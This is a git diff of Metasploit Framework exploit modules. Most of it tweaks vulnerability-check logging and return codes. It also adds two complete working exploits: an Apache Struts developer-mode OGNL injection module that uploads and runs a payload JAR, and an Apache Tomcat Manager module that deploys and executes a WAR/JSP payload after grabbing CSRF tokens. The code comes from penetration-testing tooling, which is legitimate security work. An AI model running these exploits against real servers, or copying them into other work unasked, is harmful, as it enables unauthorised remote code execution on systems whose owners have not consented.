elsif response.body =~ /#{token} ((:?\d\.?)+)/ - print_status("PHP Version #{$1}") + vprint_status("PHP Version #{$1}") return CheckCode::Vulnerable end return CheckCode::Safe diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index e571186ccf..61a67e8e40 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote # -s Display colour syntax highlighted source. def check - print_status("Checking uri #{uri}") + vprint_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri }) if response and response.code == 200 and response.body =~ /\\ normalize_uri(target_uri.path, '/js/messages.php') }) rescue - print_error("Unable to connect to server.") + vprint_error("Unable to connect to server.") return CheckCode::Unknown end if res.code != 200 - print_error("Unable to query /js/messages.php") + vprint_error("Unable to query /js/messages.php") return CheckCode::Unknown end php_version = res['X-Powered-By'] if php_version - print_status("PHP Version: #{php_version}") + vprint_status("PHP Version: #{php_version}") if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/ if $1.to_i > 5 return CheckCode::Safe @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end else - print_status("Unknown PHP Version") + vprint_status("Unknown PHP Version") end if res.body =~ /pmaversion = '(.*)';/ @@ -99,15 +99,17 @@ class Metasploit3 < Msf::Exploit::Remote when '3.5.8.1', '4.0.0-rc3' return CheckCode::Safe when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' - return CheckCode::Vulnerable + return CheckCode::Appears else if $1.starts_with? '3.5.' - return CheckCode::Vulnerable + return CheckCode::Appears end - return CheckCode::Unknown + return CheckCode::Detected end end + + CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 8735bf0c23..651e5e8977 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(datastore['URI']) uri << '/' if uri[-1,1] != '/' - print_status("Checking uri #{uri}") + vprint_status("Checking uri #{uri}") response = send_request_cgi({ 'method' => "POST", diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 18c96f5a25..57220832a0 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body =~ /PHPTAX by William L\. Berggren/ return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index de5cec0c88..ac5fb0e31e 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri }, 25) if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end # patched == zExceptions.NotFound return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index d2fdfdfb94..2b121e3576 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /pmwiki-2.[0.00-2.34]/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 3f133d1344..edc0b5e3fc 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index 2e47e916bc..6b1b20990d 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,9 +136,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end # diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 27b4c3b6da..9d6b7e74f4 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")}) if res and res.body =~ /
.+qdPM ([\d])\.([\d]).+\<\/div\>/m major, minor = $1, $2 - return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70 + return Exploit::CheckCode::Appears if (major+minor).to_i <= 70 end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index 1b0d70e7d0..900616eef6 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.body =~ /SiT! Support Incident Tracker v(\d)\.(\d\d)/) ver = [ $1.to_i, $2.to_i ] - print_status("SiT! #{ver[0]}.#{ver[1]}") + vprint_status("SiT! #{ver[0]}.#{ver[1]}") if (ver[0] == 3 and ver[1] == 65) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif (ver[0] == 3 and ver[1] < 65) return Exploit::CheckCode::Appears end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 5a04dceeaf..26bb6cd764 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote end if install_path.include?("\\") - print_status("Target looks like Windows") + vprint_status("Target looks like Windows") else - print_status("Target looks like Linux") + vprint_status("Target looks like Linux") end return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 980a62bcdd..0c710b83ac 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.body =~ /Splunk Inc\. Splunk/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 61124efda2..1db90c817f 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" t1 = Time.now - print_status("Asking remote server to sleep for #{sleep_time} seconds") + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") response = execute_command(check_cmd) t2 = Time.now delta = t2 - t1 diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index d2f2e17421..709cbaabe0 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? or res.code != 200 - print_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI") + vprint_error("#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI") return Exploit::CheckCode::Unknown end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def auto_target diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb new file mode 100644 index 0000000000..6bd7c2854f --- /dev/null +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts Developer Mode OGNL Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in Apache + Struts 2. The problem exists on applications running in developer mode, + where the DebuggingInterceptor allows evaluation and execution of OGNL + expressions, which allows remote attackers to execute arbitrary Java + code. This module has been tested successfully in Struts 2.3.16, Tomcat + 7 and Ubuntu 10.04. + }, + 'Author' => + [ + 'Johannes Dahse', # Vulnerability discovery and PoC + 'Andreas Nusser', # Vulnerability discovery and PoC + 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\ + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-0394'], + [ 'OSVDB', '78276'], + [ 'EDB', '18329'], + [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ], + [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Struts 2', { } ] + ], + 'DisclosureDate' => 'Jan 06 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) + ], self.class) + end + + def check + vprint_status("Testing to see if the target can evaluate our Java code...") + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})") + + if res and res.code == 200 and res.body.to_i == sum + return Exploit::CheckCode::Vulnerable + end + + if res and res.code == 200 and res.body.to_s =~ /#{sum}/ + vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:") + vprint_line(res.body.to_s) + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def exploit + @payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar" + + upload_jar + execute_jar + end + + def upload_jar + append = 'false' + jar = payload.encoded_jar.pack + chunk_length = 384 # 512 bytes when base64 encoded + + while(jar.length > chunk_length) + java_upload_part(jar[0, chunk_length], @payload_jar, append) + jar = jar[chunk_length, jar.length - chunk_length] + append='true' + end + java_upload_part(jar, @payload_jar, append) + end + + def java_upload_part(part, filename, append = 'false') + cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append})," + cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," + cmd << "#f.close()" + execute_command(cmd) + end + + def execute_jar + cmd = "" + # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1 + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," + cmd << "#q.setAccessible(true),#q.set(null,true)," + cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," + cmd << "#q.setAccessible(true),#q.set(null,false)," + # create classloader + cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()})," + # load class + cmd << "#c=#cl.loadClass('metasploit.Payload')," + # invoke main method + cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" + cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" + execute_command(cmd) + end + + def execute_command(cmd) + injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD" + injection.gsub!(/CMD/, cmd) + + vprint_status("Attempting to execute: #{cmd}") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s), + 'method' => 'GET', + 'vars_get' => + { + 'debug' => 'command', + 'expression' => injection + } + }) + + return res + end + + +end diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 7333dd15c3..a2999d8026 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -176,11 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote def check #initialise some base vars @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" - print_status("Performing Check...") + vprint_status("Performing Check...") sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" t1 = Time.now - print_status("Asking remote server to sleep for #{sleep_time} seconds") + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") response = execute_command(check_cmd) t2 = Time.now delta = t2 - t1 @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif delta < sleep_time return Exploit::CheckCode::Safe else - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 4a0d8c89b6..d9ad21808f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 if res.body =~ /

Company logo\s+
TestLink 1\.9\.3/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end end end @@ -81,9 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project Home<\/a>
/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 1e3a9888d1..12c2423529 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect return CheckCode::Unknown if res.nil? if (res.code.between?(400, 499)) - print_error("Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -128,8 +128,8 @@ class Metasploit3 < Msf::Exploit::Remote :active => true ) - print_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}") - return CheckCode::Vulnerable + vprint_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}") + return CheckCode::Appears end def auto_target diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb new file mode 100644 index 0000000000..700f280cbb --- /dev/null +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -0,0 +1,426 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } + + CSRF_VAR = 'CSRF_NONCE=' + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on Apache Tomcat servers that + have an exposed "manager" application. The payload is uploaded as a WAR archive + containing a jsp application using a POST request against the /manager/html/upload + component. + + NOTE: The compatible payload sets vary based on the selected target. For + example, you must select the Windows target to use native Windows payloads. + }, + 'Author' => 'rangercha', + 'License' => MSF_LICENSE, + 'References' => + [ + # This is based on jduck's tomcat_mgr_deploy. + # the tomcat_mgr_deploy o longer works for current versions of tomcat due to + # CSRF protection tokens. Also PUT requests against the /manager/html/deploy + # aren't allowed anymore. + + # There is no single vulnerability associated with deployment functionality. + # Instead, the focus has been on insecure/blank/hardcoded default passwords. + + # The following references refer to HP Operations Manager + ['CVE', '2009-3843'], + ['OSVDB', '60317'], + ['CVE', '2009-4189'], + ['OSVDB', '60670'], + + # HP Operations Dashboard + ['CVE', '2009-4188'], + + # IBM Cognos Express Default user/pass + ['BID', '38084'], + ['CVE', '2010-0557'], + ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], + + # IBM Rational Quality Manager and Test Lab Manager + ['CVE', '2010-4094'], + ['ZDI', '10-214'], + + # 'admin' password is blank in default Windows installer + ['CVE', '2009-3548'], + ['OSVDB', '60176'], + ['BID', '36954'], + + # tomcat docs + ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] + ], + 'Platform' => %w{ java linux win }, # others? + 'Targets' => + [ + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + } + ], + # + # Platform specific targets only + # + [ 'Windows Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'Linux x86', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 09 2009')) + + register_options( + [ + OptString.new('USERNAME', [false, 'The username to authenticate as']), + OptString.new('PASSWORD', [false, 'The password for the specified username']), + # /cognos_express/manager/ for Cognos Express (19300) + OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager']) + ], self.class) + end + + def check + res = query_manager + disconnect + + return CheckCode::Unknown if res.nil? + + if res.code.between?(400, 499) + vprint_error("#{peer} - Server rejected the credentials") + return CheckCode::Unknown + end + + return CheckCode::Safe unless res.code == 200 + + # if res.code == 200 + # there should be access to the Tomcat Manager and to the status page + res = query_status + return CheckCode::Unknown unless res + + plat = detect_platform(res.body) + arch = detect_arch(res.body) + return CheckCode::Unknown unless plat and arch + + vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => (ssl ? "https" : "http"), + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", + :active => true + ) + + return CheckCode::Appears + end + + def exploit + @app_base = rand_text_alphanumeric(4 + rand(32 - 4)) + @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + + # + # Find the session ID and the CSRF token + # + print_status("#{peer} - Retrieving session ID and CSRF token...") + unless access_manager? + fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") + end + + # + # Upload Payload + # + print_status("#{peer} - Uploading and deploying #{@app_base}...") + if upload_payload + report_auth_info( + :host => rhost, + :port => rport, + :sname => (ssl ? "https" : "http"), + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", + :active => true + ) + else + fail_with(Failure::Unknown, "Upload failed") + end + + # + # Execute Payload + # + print_status("#{peer} - Executing #{@app_base}...") + unless execute_payload + fail_with(Failure::Unknown, "Failed to execute the payload") + end + + # + # Get the new CSRF token & session id + # + unless access_manager? + fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") + end + + # + # Delete the deployed payload + # + print_status("#{peer} - Undeploying #{@app_base} ...") + unless undeploy_app + print_warning("#{peer} - Failed to undeploy #{@app_base}...") + end + end + + def query_status + path = normalize_uri(target_uri.path.to_s, 'status') + res = send_request_raw('uri' => path) + + unless res and res.code == 200 + vprint_error("Failed: Error requesting #{path}") + return nil + end + + return res + end + + def query_manager + path = normalize_uri(target_uri.path.to_s, '/html') + res = send_request_raw('uri' => path) + + return res + end + + def vars_get + vars = {} + unless @csrf_token.nil? + vars = { + "path" => @app_base, + "org.apache.catalina.filters.CSRF_NONCE" => @csrf_token + } + end + + return vars + end + + def detect_platform(body) + return nil if body.blank? + + i=0 + + body.each_line do |ln| + ln.chomp! + + i = 1 if ln =~ /OS Name/ + + if i == 9 or i == 11 + if ln.include? "Windows" + return 'win' + elsif ln.include? "Linux" + return 'linux' + elsif i==11 + return 'unknown' + end + end + + i = i+1 if i > 0 + end + end + + def detect_arch(body) + return nil if body.blank? + + i=0 + body.each_line do |ln| + ln.chomp! + + i = 1 if ln =~ /OS Architecture/ + + if i==9 or i==11 + if ln.include? 'x86' + return ARCH_X86 + elsif ln.include? 'i386' + return ARCH_X86 + elsif ln.include? 'i686' + return ARCH_X86 + elsif ln.include? 'x86_64' + return ARCH_X86 + elsif ln.include? 'amd64' + return ARCH_X86 + elsif i==11 + return 'unknown' + end + end + + i = i + 1 if i > 0 + end + end + + def find_csrf(res = nil) + return "" if res.blank? + + vprint_status("#{peer} - Finding CSRF token...") + + body = res.body + + body.each_line do |ln| + ln.chomp! + csrf_nonce = ln.index(CSRF_VAR) + next if csrf_nonce.nil? + token = ln[csrf_nonce + CSRF_VAR.length, 32] + return token + end + + return "" + end + + def generate_multipart_msg(boundary, data) + # Rex::MIME::Message is breaking the binary upload when trying to + # enforce CRLF for SMTP compatibility + war_multipart = "-----------------------------" + war_multipart << boundary + war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\"" + war_multipart << @app_base + war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n" + war_multipart << data + war_multipart << "\r\n-----------------------------" + war_multipart << boundary + war_multipart << "--\r\n" + end + + def war_payload + payload.encoded_war({ + :app_name => @app_base, + :jsp_name => @jsp_name, + :arch => target.arch, + :platform => target.platform + }).to_s + end + + def send_war_payload(url, war) + boundary_identifier = rand_text_numeric(28) + + res = send_request_cgi({ + 'uri' => url, + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, + 'user' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'cookie' => @session_id, + 'vars_get' => vars_get, + 'data' => generate_multipart_msg(boundary_identifier, war), + }) + + return res + end + + def send_request_undeploy(url) + res = send_request_cgi({ + 'uri' => url, + 'vars_get' => vars_get, + 'method' => 'POST', + 'user' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'cookie' => @session_id + }) + + return res + end + + def access_manager? + res = query_manager + return false unless res and res.code == 200 + @session_id = res.get_cookies + @csrf_token = find_csrf(res) + return true + end + + def upload_payload + war = war_payload + upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") + vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + res = send_war_payload(upload_path, war) + return parse_upload_response(res) + end + + def parse_upload_response(res) + unless res + vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + return false + end + + if res.code < 200 or res.code >= 300 + vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") + return false + end + + return true + end + + def execute_payload + jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") + + vprint_status("#{peer} - Executing #{jsp_path}...") + + res = send_request_cgi({ + 'uri' => jsp_path, + 'method' => 'GET' + }) + + return parse_execute_response(res) + end + + def parse_execute_response(res) + unless res + vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + return false + end + + if res and (res.code < 200 or res.code >= 300) + vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + return false + end + + return true + end + + def undeploy_app + undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy") + res = send_request_undeploy(undeploy_url) + + unless res + vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + return false + end + + if res and (res.code < 200 or res.code >= 300) + vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + return false + end + + return true + end + +end \ No newline at end of file diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 6f23263acf..219a01a5d6 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /Powered by Traq 2.[0-3]/ ) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb index d8cffe813e..08f3f8db30 100644 --- a/modules/exploits/multi/http/uptime_file_upload.rb +++ b/modules/exploits/multi/http/uptime_file_upload.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 81bdaf39c2..54790d69ea 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -57,26 +57,26 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php') }) rescue - print_error("Unable to access the index.php file") + vprint_error("Unable to access the index.php file") return CheckCode::Unknown end if res and res.code != 200 - print_error("Error accessing the index.php file") + vprint_error("Error accessing the index.php file") return CheckCode::Unknown end if res.body =~ /

Powered by vtiger CRM - (.*)<\/div>/i - print_status("vTiger CRM version: " + $1) + vprint_status("vTiger CRM version: " + $1) case $1 when '5.4.0', '5.3.0' - return CheckCode::Vulnerable + return CheckCode::Appears else - return CheckCode::Safe + return CheckCode::Detected end end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index d196a3a4b3..bcccbb9c2a 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 53bc8c0528..57ec58c718 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -60,14 +60,14 @@ class Metasploit4 < Msf::Exploit::Remote }) if !init or init.code != 200 - print_error("Could not connect to server") + vprint_error("Could not connect to server") return Exploit::CheckCode::Unknown end if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/ if $1 >= "2.0.0" and $1 <= "2.0.8" - print_good("Version #{$1} is vulnerable.") - return Exploit::CheckCode::Vulnerable + vprint_good("Version #{$1} is vulnerable.") + return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index f25f4f19d4..a0155ef1ed 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -83,12 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if !(res and res.length > 0) - print_status("The remote service did not reply to our request") + vprint_status("The remote service did not reply to our request") return Exploit::CheckCode::Safe end if (res =~ /passwd|group|resolv/) - print_status("The remote service is exploitable") + vprint_status("The remote service is exploitable") return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 886ac215f9..05c93f2e96 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -72,13 +72,13 @@ class Metasploit3 < 